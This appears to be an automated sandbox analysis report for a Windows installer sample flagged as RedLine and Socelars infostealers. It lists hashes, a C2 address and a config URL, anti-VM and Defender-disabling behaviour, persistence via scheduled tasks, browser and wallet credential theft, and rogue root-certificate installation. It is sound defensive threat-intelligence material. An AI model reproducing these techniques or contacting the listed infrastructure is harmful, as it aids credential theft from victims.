redline | e8c56bc5bf674b494dd03d856c03c1ecfaf70e578c09f634cf66b09534f05c02

Resubmissions

18-11-2021 19:28

211118-x6xf1sach9 10

18-11-2021 14:06

211118-remjvagfd3 10

Analysis

max time kernel
99s
max time network
306s
platform
windows11_x64
resource
win11
submitted
18-11-2021 19:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

10.5MB
MD5

b70883d05d292eeba3f756730a7d62bb
SHA1

301bc3e6004f421ed035d9f4091ebce6fc789660
SHA256

e8c56bc5bf674b494dd03d856c03c1ecfaf70e578c09f634cf66b09534f05c02
SHA512

83687a8f862f2448f1b3fdbd3523248baa1a614598ba7389d79a9c8c5debdea4bef97a048481b43a1f13cea28b73ba18f5b38775772629c253454588828128e6

Score

10^/10

redline socelars media18plus aspackv2 discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.gianninidesign.com/

Extracted

Family

redline

Botnet

media18plus

91.121.67.60:51630

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3716-306-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/3716-303-0x0000000000000000-mapping.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu131398a3143fefd0.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 4320 created 5364	4320	WerFault.exe	x3OtjDAFNjre3U_c_KxiDM_Y.exe
PID 572 created 5444	572	WerFault.exe	LsWeS0ozWjk8helLOsfpf_UJ.exe
PID 5716 created 5420	5716	WerFault.exe	F57F.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\libstdc++-6.dll	aspack_v212_v242

Blocklisted process makes network request 1 IoCs

Processes:

cmd.exe

flow pid process

54 3716 cmd.exe
Downloads MZ/PE file

flow	pid	process
54	3716	cmd.exe

Executes dropped EXE 64 IoCs

Processes:

setup_installer.exesetup_install.exeThu13ce386e385.exeThu13e7fdac52793516f.exemshta.exeThu138c8768d77029f.exeThu13559beef6a5272.exeThu13a8cbc236137c.exeThu138c8768d77029f.tmpConhost.exeThu138c8768d77029f.exeThu13fba7be709523c0e.tmpThu138c8768d77029f.tmpLzmwAqmV.exeKz4mLc.ExEYcKQmqEjHGAUKmVb2NL0JK67.execmd.exechrome.exePBrowserSetp42415.exeWorldoffer.exeinst1.exechrome update.exesearch_hyperfs_206.exesetup.exexfzhang-game.exeCalculator Installation.exeBuild.sfx.exechrome1.exeLwVHajQxuIH7xPMasrDwRCoJ.exen_J6D_QxAQKoyv9JFjlZw5cR.exeConhost.exe7X_v7kiWAsd9acBo_qe0f0sh.exeif8DNtponwYMZn_lrw_gH9IF.exe2QQMp28QCeqYImd7XcL8AKOb.exeUr7zll7Iws3vwCj6dYYyk0zp.exex3OtjDAFNjre3U_c_KxiDM_Y.exeNHA6vXgyfknAZeEsU5CDfx8R.exeStartMenuExperienceHost.exeuLtaKf_vTMMMjMFJtASoQoo4.exe2HRg5KX7zmkAK_35aSkrzi2s.exeLsWeS0ozWjk8helLOsfpf_UJ.exejB2kNKEYscJ3R8GN47isBy_l.exeF57F.exeTQJKKsY8bnpKyCSGDiZQru1v.exe8xHppuniu0MALnm_wFkWCK_Z.exeYZ1saexS6xtcCaStgSRIG6QD.exegimagex.exe0YApp39f0bRIeIddIlDOZp7j.exechrome2.exewinhostdll.exechrome3.exeChrome5.exeinst2.exeBuild.exejg1_1faf.exertst1039.exekPBhgOaGQk.exe0BW9TiJU14SQZRmxlj5jtV_P.exelakazet.exeoInNz7rcaMAqZU88AEzd04J6.exeLwVHajQxuIH7xPMasrDwRCoJ.exeOgZQOAFE1VRDNR92nNCQhrER.exeYZ1saexS6xtcCaStgSRIG6QD.exe

pid	process
2352	setup_installer.exe
984	setup_install.exe
3208	Thu13ce386e385.exe
4044	Thu13e7fdac52793516f.exe
4396	mshta.exe
2420	Thu138c8768d77029f.exe
4844	Thu13559beef6a5272.exe
3348	Thu13a8cbc236137c.exe
3544	Thu138c8768d77029f.tmp
4792	Conhost.exe
956	Thu138c8768d77029f.exe
2704	Thu13fba7be709523c0e.tmp
1540	Thu138c8768d77029f.tmp
4328	LzmwAqmV.exe
4768	Kz4mLc.ExE
4520	YcKQmqEjHGAUKmVb2NL0JK67.exe
3716	cmd.exe
2988	chrome.exe
2112	PBrowserSetp42415.exe
3932	Worldoffer.exe
4532	inst1.exe
4760	chrome update.exe
2388	search_hyperfs_206.exe
1272	setup.exe
3212	xfzhang-game.exe
3432	Calculator Installation.exe
4716	Build.sfx.exe
2028	chrome1.exe
5240	LwVHajQxuIH7xPMasrDwRCoJ.exe
5272	n_J6D_QxAQKoyv9JFjlZw5cR.exe
5300	Conhost.exe
5316	7X_v7kiWAsd9acBo_qe0f0sh.exe
5328	if8DNtponwYMZn_lrw_gH9IF.exe
5336	2QQMp28QCeqYImd7XcL8AKOb.exe
5356	Ur7zll7Iws3vwCj6dYYyk0zp.exe
5364	x3OtjDAFNjre3U_c_KxiDM_Y.exe
5412	NHA6vXgyfknAZeEsU5CDfx8R.exe
5396	StartMenuExperienceHost.exe
5404	uLtaKf_vTMMMjMFJtASoQoo4.exe
5436	2HRg5KX7zmkAK_35aSkrzi2s.exe
5444	LsWeS0ozWjk8helLOsfpf_UJ.exe
5452	jB2kNKEYscJ3R8GN47isBy_l.exe
5420	F57F.exe
5476	TQJKKsY8bnpKyCSGDiZQru1v.exe
5492	8xHppuniu0MALnm_wFkWCK_Z.exe
5484	YZ1saexS6xtcCaStgSRIG6QD.exe
5528	gimagex.exe
5664	0YApp39f0bRIeIddIlDOZp7j.exe
5796	chrome2.exe
6084	winhostdll.exe
5460	chrome3.exe
2912	Chrome5.exe
2876	inst2.exe
3284	Build.exe
1584	jg1_1faf.exe
3944	rtst1039.exe
6136	kPBhgOaGQk.exe
3544	0BW9TiJU14SQZRmxlj5jtV_P.exe
2876	inst2.exe
1960	lakazet.exe
4036	oInNz7rcaMAqZU88AEzd04J6.exe
4372	LwVHajQxuIH7xPMasrDwRCoJ.exe
3808	OgZQOAFE1VRDNR92nNCQhrER.exe
796	YZ1saexS6xtcCaStgSRIG6QD.exe

Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

n_J6D_QxAQKoyv9JFjlZw5cR.exejB2kNKEYscJ3R8GN47isBy_l.exeNHA6vXgyfknAZeEsU5CDfx8R.exex3OtjDAFNjre3U_c_KxiDM_Y.exeLsWeS0ozWjk8helLOsfpf_UJ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	n_J6D_QxAQKoyv9JFjlZw5cR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	jB2kNKEYscJ3R8GN47isBy_l.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NHA6vXgyfknAZeEsU5CDfx8R.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	x3OtjDAFNjre3U_c_KxiDM_Y.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LsWeS0ozWjk8helLOsfpf_UJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	n_J6D_QxAQKoyv9JFjlZw5cR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	jB2kNKEYscJ3R8GN47isBy_l.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NHA6vXgyfknAZeEsU5CDfx8R.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	x3OtjDAFNjre3U_c_KxiDM_Y.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LsWeS0ozWjk8helLOsfpf_UJ.exe

Loads dropped DLL 19 IoCs

Processes:

setup_install.exeThu138c8768d77029f.tmpThu138c8768d77029f.tmpCalculator Installation.exeinst2.exemsiexec.exe

pid	process
984	setup_install.exe
984	setup_install.exe
984	setup_install.exe
984	setup_install.exe
984	setup_install.exe
984	setup_install.exe
3544	Thu138c8768d77029f.tmp
1540	Thu138c8768d77029f.tmp
3432	Calculator Installation.exe
3432	Calculator Installation.exe
2876	inst2.exe
3432	Calculator Installation.exe
3432	Calculator Installation.exe
3432	Calculator Installation.exe
3432	Calculator Installation.exe
5088	msiexec.exe
5088	msiexec.exe
3432	Calculator Installation.exe
3432	Calculator Installation.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

x3OtjDAFNjre3U_c_KxiDM_Y.exeLsWeS0ozWjk8helLOsfpf_UJ.exen_J6D_QxAQKoyv9JFjlZw5cR.exeNHA6vXgyfknAZeEsU5CDfx8R.exejB2kNKEYscJ3R8GN47isBy_l.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	x3OtjDAFNjre3U_c_KxiDM_Y.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	LsWeS0ozWjk8helLOsfpf_UJ.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	n_J6D_QxAQKoyv9JFjlZw5cR.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	NHA6vXgyfknAZeEsU5CDfx8R.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jB2kNKEYscJ3R8GN47isBy_l.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

explorer.exe

description ioc process

File opened (read-only) \??\D: explorer.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
File opened (read-only)	\??\D:	explorer.exe

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
33	ipinfo.io
35	api.db-ip.com
62	ipinfo.io
142	api.db-ip.com
217	ipinfo.io
221	api.db-ip.com
2	ipinfo.io
62	api.db-ip.com
67	ip-api.com
140	ipinfo.io
251	ip-api.com
2	api.db-ip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

jB2kNKEYscJ3R8GN47isBy_l.exen_J6D_QxAQKoyv9JFjlZw5cR.exeNHA6vXgyfknAZeEsU5CDfx8R.exe

pid process

5452 jB2kNKEYscJ3R8GN47isBy_l.exe
5272 n_J6D_QxAQKoyv9JFjlZw5cR.exe
5412 NHA6vXgyfknAZeEsU5CDfx8R.exe

pid	process
5452	jB2kNKEYscJ3R8GN47isBy_l.exe
5272	n_J6D_QxAQKoyv9JFjlZw5cR.exe
5412	NHA6vXgyfknAZeEsU5CDfx8R.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

mshta.exex3OtjDAFNjre3U_c_KxiDM_Y.exeLsWeS0ozWjk8helLOsfpf_UJ.exeLwVHajQxuIH7xPMasrDwRCoJ.exeYZ1saexS6xtcCaStgSRIG6QD.exe

description	pid	process	target process
PID 4396 set thread context of 3716	4396	mshta.exe	cmd.exe
PID 5364 set thread context of 5956	5364	x3OtjDAFNjre3U_c_KxiDM_Y.exe	AppLaunch.exe
PID 5444 set thread context of 1592	5444	LsWeS0ozWjk8helLOsfpf_UJ.exe	AppLaunch.exe
PID 5240 set thread context of 4372	5240	LwVHajQxuIH7xPMasrDwRCoJ.exe	LwVHajQxuIH7xPMasrDwRCoJ.exe
PID 5484 set thread context of 796	5484	YZ1saexS6xtcCaStgSRIG6QD.exe	YZ1saexS6xtcCaStgSRIG6QD.exe

Drops file in Program Files directory 20 IoCs

Processes:

Thu13fba7be709523c0e.tmpBuild.sfx.exeThu138c8768d77029f.tmpif8DNtponwYMZn_lrw_gH9IF.exeConhost.exe

description	ioc	process
File created	C:\Program Files (x86)\Gparted\is-0FMFM.tmp	Thu13fba7be709523c0e.tmp
File created	C:\Program Files (x86)\Gparted\is-ACJO4.tmp	Thu13fba7be709523c0e.tmp
File opened for modification	C:\Program Files (x86)\Gparted\unins000.dat	Thu13fba7be709523c0e.tmp
File created	C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259277953	Build.sfx.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu138c8768d77029f.tmp
File created	C:\Program Files (x86)\Gparted\Build.exe	Build.sfx.exe
File opened for modification	C:\Program Files (x86)\Gparted\Build.exe	Build.sfx.exe
File created	C:\Program Files (x86)\Gparted\unins000.dat	Thu13fba7be709523c0e.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu138c8768d77029f.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-00S1S.tmp	Thu138c8768d77029f.tmp
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	if8DNtponwYMZn_lrw_gH9IF.exe
File opened for modification	C:\Program Files (x86)\Gparted\Build.sfx.exe	Thu13fba7be709523c0e.tmp
File created	C:\Program Files (x86)\Gparted\is-5NFHJ.tmp	Thu13fba7be709523c0e.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\rtst1039.exe	Conhost.exe
File opened for modification	C:\Program Files (x86)\Gparted\gimagex.exe	Thu13fba7be709523c0e.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst2.exe	Conhost.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	Conhost.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	Conhost.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	Conhost.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	if8DNtponwYMZn_lrw_gH9IF.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1176	5364	WerFault.exe	x3OtjDAFNjre3U_c_KxiDM_Y.exe
5852	5444	WerFault.exe	LsWeS0ozWjk8helLOsfpf_UJ.exe
3836	5420	WerFault.exe	wJr4YhTOhL6hRuB9JEQQpWXL.exe
5596	5436	WerFault.exe	2HRg5KX7zmkAK_35aSkrzi2s.exe
5720	5396	WerFault.exe	wkzYKAhydGq3upqrOzF0lD0i.exe
1056	3932	WerFault.exe	Worldoffer.exe
5220	5664	WerFault.exe	0YApp39f0bRIeIddIlDOZp7j.exe
2248	5356	WerFault.exe	Ur7zll7Iws3vwCj6dYYyk0zp.exe
4452	3624	WerFault.exe	xJgVmfIhKjtWL6432nC1M2Av.exe
3500	1236	WerFault.exe	BpcsEeqEvm1L1jBwjkb_ljG4.exe
3220	4864	WerFault.exe	JovvV91HGm0RmxGj8dpqPad1.exe
6960	3128	WerFault.exe	AF0F.exe
7984	5420	WerFault.exe	F57F.exe

Checks SCSI registry key(s) 3 TTPs 21 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exeYZ1saexS6xtcCaStgSRIG6QD.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName	explorer.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	YZ1saexS6xtcCaStgSRIG6QD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	YZ1saexS6xtcCaStgSRIG6QD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	YZ1saexS6xtcCaStgSRIG6QD.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

3260 schtasks.exe
4656 schtasks.exe
5556 schtasks.exe
Download via BitsAdmin 1 TTPs 2 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exe

pid process

5288 bitsadmin.exe
2008 bitsadmin.exe

pid	process
3260	schtasks.exe
4656	schtasks.exe
5556	schtasks.exe

pid	process
5288	bitsadmin.exe
2008	bitsadmin.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2388 taskkill.exe
2460 taskkill.exe
11472 taskkill.exe

pid	process
2388	taskkill.exe
2460	taskkill.exe
11472	taskkill.exe

Modifies registry class 12 IoCs

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{4A40EE8B-BD23-44B1-9EA3-EEA91CC84573}	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202020202020202020202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000050000000300000004000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost = 6801000088020000	explorer.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

if8DNtponwYMZn_lrw_gH9IF.exeTQJKKsY8bnpKyCSGDiZQru1v.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173